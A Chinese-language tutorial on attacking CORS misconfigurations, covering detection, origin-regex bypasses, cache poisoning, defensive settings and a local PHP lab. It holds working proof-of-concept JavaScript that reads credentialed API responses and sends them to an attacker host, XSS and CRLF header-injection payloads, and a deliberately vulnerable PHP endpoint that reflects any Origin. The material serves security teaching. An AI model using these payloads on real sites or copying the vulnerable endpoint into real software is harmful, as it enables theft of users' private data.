0x01: 过程

三个步骤测试CORS错误配置

  1. 识别
  2. 分析
  3. 利用


0x01.1 识别

首先,想要测试带有CORS缺陷应用的首先条件是要找到开启CORS的应用。
APIs一个不错的选择,因为他们经常和不同的域交换信息。因此,通常情况下,接口会暴露一些信息收集和信息枚举的功能。
通常,当服务器收到头部带有”Origin”字段的请求的时候才会配置CORS,因此才会很容易的产生很多这样类型的漏洞。
另外,如果客户端收到返回报文的头部包含“Access-Control-*”这样的字段,但是没有定义源的话,那么很可能返回报文的头部是由请求报文中“Origin”这个字段来决定的。
因此,找到候选接口之后,就可以发送头部带有“Origin”的数据包了。测试者应该试图让“Origin”字段使用不同的值,比如不同的域名称或者”null”。最好用一些的脚本自动化的完成这些任务。

比如:

  1. GET /handler_to_test HTTP/1.1
  2. Host: target.domain
  3. Origin: https://target.domain
  4. Connection: close

然后看服务器的返回报文头部是否带有“Access-Control-Allow-*”字段

  1. HTTP/1.1 200 OK
  2. Access-control-allow-credentials: true
  3. Access-control-allow-origin: https://target.domain

上面的返回报文表明,这个应用中的接口已经开启了CORS这个功能。现在有必要对配置进行测试,以确定是否存在安全缺陷。

0x01.2 分析

识别出开启的CORS功能的接口之后,就要尽可能的分析配置,以发现正确的利用方式。
在这个阶段,开始fuzzing请求报文头部中“Origin”这个字段然后观察服务器的返回报文,目的是看哪些域是被允许的。
重要的是验证,哪种类型的控件可以被控制,应用会返回哪种头部字段。
因此,测试者应该发送发送头部字段“Origin”包含不同值的请求发送给服务器端,看看攻击者所控制的域名是否被允许。

  1. GET /handler_to_test HTTP/1.1
  2. Host: target.domain
  3. Origin: https://attaker.domain
  4. Connection: close

然后看服务器的返回报文头部是否带有“Access-Control-Allow-*”字段

  1. HTTP/1.1 200 OK
  2. Access-control-allow-credentials: true
  3. Access-control-allow-origin: https://attacker.domain

在这次测试示例中,服务器返回的报文头部中已经表明完全信任“attacker.domain”这个域,并且可以向这个域中发送用户凭据。

0x01.3 利用

(1) 有用户凭据的利用

从一个攻击者角度来看,看到目标应用的“AccessControl-Allow-Credentials”设置为“true”时是非常开心的。在这种情况下,攻击者会利用配置错误去偷走受害人的隐私数据和敏感数据。
下面这个表简要说明基于CORS配置的可利用性

“Access-Control-Allow-Origin” 值 “Access-Control-Allow-Credentials” 值 是否可利用
https://attacker.com true
null true
* true

泄露用户数据

当“Access-Control-Allow-Credentials”设置为Ture时,利用这种CORS这种配置缺陷的基本技术就是创建一个JavaScript脚本去发送CORS请求,就像下面那样:

  1. var req = new XMLHttpRequest(); 创建一个XMLHttpRequest对象
  2. req.onload = reqListener;
  3. req.open(“get”,”https://vulnerable.domain/api/private-data”,true);
  4. req.withCredentials = true;
  5. req.send();
  6. function reqListener() {
  7. location=”//attacker.domain/log?response=”+this.responseText;
  8. };

用这样的代码黑客就可以通过有缺陷的“日志”接口偷到用户数据。
当带有目标系统用户凭据的受害者访问带有上述代码的页面的时候,浏览器就会发送下面的请求到“有漏洞服务器”

  1. GET /api/private-data HTTP/1.1
  2. Host: vulnerable.domain
  3. Origin: https://attacker.domain/
  4. Cookie: JSESSIONID=<redacted>

然后就会收到下面的返回数据

  1. HTTP/1.1 200 OK
  2. Server: Apache-Coyote/1.1
  3. Access-Control-Allow-Origin: https://attacker.domain
  4. Access-Control-Allow-Credentials: true
  5. Access-Control-Expose-Headers: Access-Control-Allow-Origin,Access-Control-Allow-Credentials
  6. Vary: Origin
  7. Expires: Thu, 01 Jan 1970 12:00:00 GMT
  8. Last-Modified: Wed, 02 May 2018 09:07:07 GMT
  9. Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
  10. Pragma: no-cache
  11. Content-Type: application/json;charset=ISO-8859-1
  12. Date: Wed, 02 May 2018 09:07:07 GMT
  13. Connection: close
  14. Content-Length: 149
  15. {"id":1234567,"name":"Name","surname":"Surname","email":"email@target.local","account":"ACT1234567","balance":"123456,7","token":"to
  16. p-secret-string"}

因为服务器发送了头部字段“Access-Control-Allow-*”给客户端,所以,受害者浏览器允许包含恶意JavaScript代码的页面访问用户的隐私数据。
image.png

(2)没有用户凭据的利用方式

在这种情况下,目标应用允许通过发送“Origin”去影响返回头“Access-Control-Allow-Origin”的值,但是不允许传输用户凭证
下面这个表简要说明基于CORS配置的可利用性

“Access-Control-Allow-Origin” 值 是否可利用
https://attacker.com
null
*

如果不能携带用户凭据的话,那么就会减少攻击者的攻击面,并且很明显的是,攻击者将很难拿到用户的cookie。此外,会话固定攻击也是不可行的,因为浏览器会忽略应用设置的新的cookie。

绕过基于ip的身份验证

实际的攻击中总有意外,如果目标从受害者的网络中可以到达,但使用ip地址作为身份验证的方式。这种情况通常发生在缺乏严格控制的内网中。
在这种场景下,黑客会利用受害者的浏览器作为代理去访问那些应用并且可以绕过那些基于ip的身份验证。就影响而言,这个类似于DNS重绑定,但会更容易利用。

客户端缓存中毒

这种配置允许攻击者利用其他的漏洞。
比如,一个应用返回数据报文头部中包含“X-User”这个字段,这个字段的值没有经过验证就直接输出到返回页面上。
请求:

  1. GET /login HTTP/1.1
  2. Host: www.target.local
  3. Origin: https://attacker.domain/
  4. X-User: <svg/onload=alert(1)>

返回报文(注意:“Access-Control-Allow-Origin”已经被设置,但是“Access-Control-Allow-Credentials: true”并且“Vary: Origin”头没有被设置)

  1. HTTP/1.1 200 OK
  2. Access-Control-Allow-Origin: https://attacker.domain/
  3. Content-Type: text/html
  4. Invalid user: <svg/onload=alert(1)

攻击者可以把xss的exp放在自己控制的服务器中的JavaScript代码里面然后等待受害者去触发它。

  1. var req = new XMLHttpRequest();
  2. req.onload = reqListener;
  3. req.open('get','http://www.target.local/login',true);
  4. req.setRequestHeader('X-User', '<svg/onload=alert(1)>');
  5. req.send();
  6. function reqListener() {
  7. location='http://www.target.local/login';
  8. }

如果在返回报文中头部没有设置“Vary: Origin”,那么可以利用上面展示的例子,可以让受害者浏览器中的缓存中存储返回数据报文(这要基于浏览器的行为)并且当浏览器访问到相关URL的时候就会直接显示出来。(通过重定向来实现,可以用“reqListener()”这个方法)
image.png

如果没有CORS的话,上面的缺陷就没法利用,因为没有办法让受害者浏览器发送自定义头部,但是如果有了CORS,就可以用“XMLHttpRequest”做这个事情。

服务器端缓存中毒

另一种潜在的攻击方式是利用CORS的错误配置注入HTTP头部,这可能会被服务器端缓存下来,比如制造存储型xss
下面是攻击的利用条件:

  • 存在服务器端缓存
  • 能够反射“Origin“头部
  • 不会检查“Origin”头部中的特殊字符,比如”\r”
    有了上面的先决条件,James Kettle展示了http头部注入的利用方式,他用这种方式攻击IE/Edge用户(因为他们使用“\r”(0x0d)作为的HTTP头部字段的终结符)

请求

  1. GET / HTTP/1.1
  2. Origin: z[0x0d]Content-Type: text/html; charset=UTF-7

IE处理过后返回报文

  1. HTTP/1.1 200 OK
  2. Access-Control-Allow-Origin: z
  3. Content-Type: text/html; charset=UTF-7

上面的请求不能直接拿来利用,因为攻击者没有办法保证受害者浏览器会提前发送畸形的头部。
如果攻击者能提前发送畸形的“Origin”头部,比如利用代理或者命令行的方式发送,然后服务器就会缓存这样的返回报文并且也会传递给其他人。
利用上面的例子,攻击者可以把页面的编码变成”UTF-7”,周所周知,这可能会引发xss漏洞

0x02: 绕过技术

有时,需要信任不同的域或者所有的子域,所以开发者要用正则表达式或者其他的方法去验证有效性。
下面的部分列出了一系列的“起源”,可以用来绕过某些验证控制,以验证“起源”头的有效性。
下面的例子中的目标域一般指“target.local”。

NULL源

CORS的规范中还提到了“NULL”源。触发这个源是为了网页跳转或者是来自本地HTML文件。
目标应用可能会接收“null”源,并且这个可能被测试者(或者攻击者)利用,意外任何网站很容易使用沙盒iframe来获取”null“源

  1. <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>**CORS request here**</script>’></iframe>

使用上面的iframe产生一个请求类似于下面这样

  1. GET /handler
  2. Host: target.local
  3. Origin: null

如果目标应用接收”null”源,那么服务器将返回类似下面的数据报文

  1. HTTP/1.1 200 OK
  2. Acess-Control-Allow-Origin: null
  3. Access-Control-Allow-Credentials: true

这种错误配置经常会碰到,所以会很方便的去尝试它。

使用目标域名作为子域名

如果目标应用只检查只检查“Origin”中的字符串是否包含“target.local”,那么就可以在自己控制的服务器上创建一个子域名。
用这样的方式,请求一般产生自JavaScript代码,并且请求中的“Origin”会像下面这样

  1. Origin: https://target.local.attacker.domain

注册一个同名的域名

假设,目标应用实现是基于下面的正则表达式去检测“Origin”头部的话:

  1. ^https?:\/\/.*\.?target\.local$

这样的正则表达式包含一个问题,导则这样的CORS配置都容易被攻击。下面表格将分解正则表达式:

Part 描述
.* 除了终止符的任何字符
\. 一个点
? 在这里匹配一个“.”一次或者零次

这个?只影响”.”这个字符串,因此在“target.local”前面的任何字符串都是被允许的,而不管是否有”.”把他们分开。
因此,只需要在“origin”末尾包含目标域名就可以绕过上面的限制(这个场景的的目标域名是“
target.local”),比如:

  1. Origin: https://nottarget.local

攻击者只需要注册一个末尾包含目标域名的新域名就可以利用这样的漏洞了。

控制目标的子域名

现在目标应用实现是基于下面的正则表达式去检测“Origin”头部的话:

  1. ^https?:\/\/(.*\.)?target\.local$

这个允许来自”target.local“的跨域访问并且包含所有的子域名(来自HTTP和HTTPS协议)。
在这个场景中,如果攻击者能控制目标的有效的子域名(比如:“subdomain.target.local”),比如接管一个子域名,或者找到一个有xss漏洞的子域名。攻击者就可以产生一个有效的CORS请求。

第三方域名

有时一些第三方域名会被允许。如果黑客能在这些域名里面上传JavaScript脚本的话,他们就可以攻击目标了。
最有代表性的例子是,Amazon S3存储桶的有时是被信任的。如果目标应用使用亚马逊的服务,那么来自亚马逊S3存储桶上的请求就会被信任。
在这种场景下,攻击者会控制一个S3的存储桶,并在上面放上恶意页面。

使用特殊的特性

Corban Leo展示了一个比较有趣的研究,他在域名中插入一些特殊的字符来绕过一些限制。
这个研究员的特殊字符法只能用在Safari浏览器上。但是,我们进行了深入的分析,显示其中一部分特殊字符串也可以用在其他的浏览器中。
这种规避技术所面临的问题是,在发送请求之前,浏览器不总是会去验证域名的有效性。因此,如果使用一些特殊的字符串,那么浏览器可能就不会提前发送请求去验证域名是否存在或者有效。
假设,目标应用实现是基于下面的正则表达式去检测“Origin”头部的话:

  1. ^https?:\/\/(.*\.)?target.local([^\.\-a-zA-Z0-9]+.*)?

上面的正则表达式的意思是,允许所有“target.local”的子域名的跨域请求,并且这些请求可以来自于子域名的任意端口。
下面是正则表达式的分解:

Part 描述
[^\.\-a-zA-Z0-9] 所有的字符串包含”.”,”-“,”a-z”,”A-Z”,”0-9”
+ 匹配前面的子表达式一次或多次
.* 除了终止符的任何字符

这个正则表达式阻止前面例子中的攻击,因此前面的绕过技术不会起作用(除非你控制了一给合法的子域名)
下面的截屏展示了返回报文中没有“Access-Control-Allow-Origin” (ACAO) 和 “Access-Control-AllowCrendentials” (ACAC) 被设置。(使用前面的一种绕过技术)
image.png
因为,正则表达式匹配紧挨着的ASCII字母和”.”,”-“,在“target.local”后面的每一个字母都会被信任。
image.png
注意:当前浏览器只有Safari支持使用上面的域名(带“{”那个字符的),但是如果目标应用的正则表达式能够信任其他的特殊字母,那么就可以使用CORS的错误配置去攻击其他的浏览器啦。
下面这个表包含各个浏览器对特殊字符的“兼容性”
(注意:仅包含至少一个浏览器允许的特殊字符)

特殊字符 Chrome(v 67.0.3396) Edge(v 41.16299.371) Firefox(v 61.0.1) Internet Explorer(v 11) Safari(v 11.1.1)
! NO NO NO NO YES
= NO NO NO NO YES
$ NO NO YES NO YES
& NO NO NO NO YES
NO NO NO NO YES
( NO NO NO NO YES
) NO NO NO NO YES
* NO NO NO NO YES
+ NO NO YES NO YES
, NO NO NO NO YES
- YES NO YES YES YES
; NO NO NO NO YES
= NO NO NO NO YES
^ NO NO NO NO YES
_ YES YES YES YES YES
` NO NO NO NO YES
{ NO NO NO NO YES
\ NO NO NO NO YES
} NO NO NO NO YES
~ NO NO NO NO YES

利用钱的准备:

  • 泛解析域名要指向你的服务器
  • NodeJS:因为Apache和Nginx(开箱即用)不支持特殊的字符
    创建一个serve.js 文件

    1. var http = require('http');
    2. var url = require('url');
    3. var fs = require('fs');
    4. var port = 80
    5. http.createServer(function(req, res) {
    6. if (req.url == '/cors-poc') {
    7. fs.readFile('cors.html', function(err, data) {
    8. res.writeHead(200, {'Content-Type':'text/html'});
    9. res.write(data);
    10. res.end();
    11. });
    12. } else {
    13. res.writeHead(200, {'Content-Type':'text/html'});
    14. res.write('never gonna give you up...');
    15. res.end();
    16. }
    17. }).listen(port, '0.0.0.0'); console.log(`Serving on port ${port}`);
  • 在相同的目录下创建cors.html

    1. <html>
    2. <head><title>CORS PoC</title></head>
    3. <body onload="cors();">
    4. <div align="center">
    5. <h2>CORS Proof of Concept</h2>
    6. <textarea rows="15" cols="70" id="container"></textarea> </div>
    7. <script> function cors() {
    8. var req = new XMLHttpRequest();
    9. req.onload = reqListener; req.open("GET","http://www.target.local/api/private-data",true); req.withCredentials = true;
    10. req.send();
    11. function reqListener() {
    12. document.getElementById("container").innerHTML = this.responseText; }
    13. } </script>
  • 现在启动NodeJS服务并且运行下面的指令:

    1. node serve.js &
  • 如果目标应用使用上面的表达式实现对“Origin”过滤的话,那么除了“.” 和“-“之外,“www.target.local”后面的每一个特殊字符都会被信任,因此当Safari浏览器完成的以下产生的有效请求后,攻击者能够从易受攻击的目标中窃取数据。

    1. http://www.target.local{.<your-domain>/cors-poc
  • 浅谈CORS跨域资源共享攻击技术 - 图5

如果正则表达式支持下划线的话,那么可能其他的浏览器(在上面的表格中列出数据)也可以利用CORS配置错误了,就像下面的例子一样:

  1. http://www.target.local_.<your-domain>/cors-poc

浅谈CORS跨域资源共享攻击技术 - 图6

0x03: 防御技术

(1)如果不必要就不要开启CORS

首先,要仔细的评估是否开启CORS。如果没有必要,建议完全避免使用它,以免削弱SOP。

(2)定义白名单

如果是绝对必要的话,要定义“源”的白名单。我更喜欢白名单,如果可能的话,不要使用正则表达式,因为根据前面的描述,正则表达式更容易出错,导致CORS的配置错误。
不要配置“Access-Control-Allow-Origin”为通配符“*”,而且更重要的是,要严格效验来自请求数据包中的“Origin”的值。
当收到跨域请求的时候,要检查“Origin”的值是否是一个可信的源。

(3) 仅仅允许安全的协议

有必要验证协议以确保不允许来自不安全通道(HTTP)的交互,否则中间人(MitM)将绕过应用是所使用的HTTPS。

(4) 配置“VARY”头部

要尽可能的返回”Vary: Origin”这个头部,以避免攻击者利用浏览器缓存

(5) 如果可能的话避免使用“CREDENTIALS”

由于“Access-Control-Allow-Credentials”标头设置为“true”时允许跨域请求中带有凭证数据,因此只有在严格必要时才应配置它。此头部也增加了CSRF攻击的风险;因此,有必要对其进行保护。
要特别关注的实现的标准,如果没有定义参数的话,那么默认值很可能是“true”。要仔细阅读官方文档,如果感觉模糊不清的话,就把值设置成“false”.

(6) 限制使用的方法

通过“Access-Control-Allow-Methods”头部,还可以配置允许跨域请求的方法,这样可以最大限度地减少所涉及的方法,配置它始终是一个好习惯。

(7) 限制缓存的时间

建议通过“Access-Control-Allow-Methods”和“Access-Control-Allow-Headers”头部,限制浏览器缓存信息的时间。可以通过使用“Access-Control-Max-Age”标题来完成,该头部接收时间数作为输入,该数字是浏览器保存缓存的时间。配置相对较低的值(例如大约30分钟),确保浏览器在短时间内可以更新策略(比如允许的源)

(8) 仅配置所需要的头

最后一点,要仅在接收到跨域请求的时候才配置有关于跨域的头部,并且确保跨域请求是合法的(只允许来自合法的源)
实际上,在其他情况下,如果没有理由就不要配置这样的头部,这种方式可以减少某些用户恶意利用的可能性。

0x04: 配置和实施

很多软件框架是允许使用CORS的,当使用这些解决方案的时候,我们要着重++注意默认值++(“origin” 和 “credentials”是否被明确的设置)因为有些默认值是不安全的
我们分析一些主要的软件框架。下面这个表是总结的结果(注意:这仅指默认配置,在所有情况下都可以以安全的方式配置它们)
浅谈CORS跨域资源共享攻击技术 - 图7
浅谈CORS跨域资源共享攻击技术 - 图8

0x05:攻击例子

准备两个域名
站点域名:http://test.test
攻击者域名:http://atest.test

站点域名需要准备的文件

  1. 文件名称:login.php
  2. 目录:cors-test\login.php
  3. <?php
  4. session_start();
  5. $_SESSION['test_token'] = 'test';
  6. echo '登录成功';
  1. 文件名称:user_info.php
  2. 目录:cors-test\user_info.php
  3. <?php
  4. $origin = @$_SERVER['HTTP_ORIGIN'];
  5. if (!$origin) {
  6. exit('请携带origin');
  7. }
  8. header('Access-Control-Allow-Origin:'.$origin);
  9. header('Access-Control-Allow-Credentials:true');
  10. session_start();
  11. if (!@$_SESSION['test_token']) {
  12. exit('请登录');
  13. }
  14. $data = array('username'=>'P喵呜-phpoop','email' => '3303003493@qq.com');
  15. $json = json_encode($data);
  16. echo $json;

攻击者域名需要准备的文件

  1. 文件名称:cors.html
  2. 目录:cors-test\cors.html
  3. <!DOCTYPE html>
  4. <html>
  5. <head><title>CORS</title></head>
  6. <body>
  7. <center>
  8. <textarea rows="10" cols="60" id="pwnz">
  9. </textarea><br>
  10. <button type="button" onclick="cors()">Exploit</button>
  11. <script>
  12. function cors() {
  13. var xhttp = new XMLHttpRequest();
  14. xhttp.onreadystatechange = function() {
  15. if (this.readyState == 4 && this.status == 200) {
  16. document.getElementById("pwnz").innerHTML = this.responseText;
  17. alert(this.responseText)
  18. }
  19. };
  20. var data="";
  21. xhttp.open("GET", "http://test.test/cors-test/user_info.php");
  22. xhttp.withCredentials = true;
  23. xhttp.send();
  24. }
  25. </script>

测试的代码文件

cors-test.zip

攻击开始

首先受害者先进行登录

打开地址: http://test.test/cors-test/login.php
image.png

攻击者发送有害地址给受害者

受害者打开:http://atest.test/cors-test/cors.html
image.png

成功劫持到用户数据

0x06 总结

其实挖cors方法最简单的就是关注这几点

  1. 请求端存在Origin头
  2. 返回包里面的Access-Control-Allow-Origin字段返回值是否与请求端发送的Origin一致
  3. Access-Control-Allow-Credentials 为 true

Access-Control-Allow-Credentials 必须为true 因为不为true的也没什么好劫持的

如果上面列的都有了,那么大概率就是有cors了,至于有没有其他的过滤,那就看自己功底来绕过了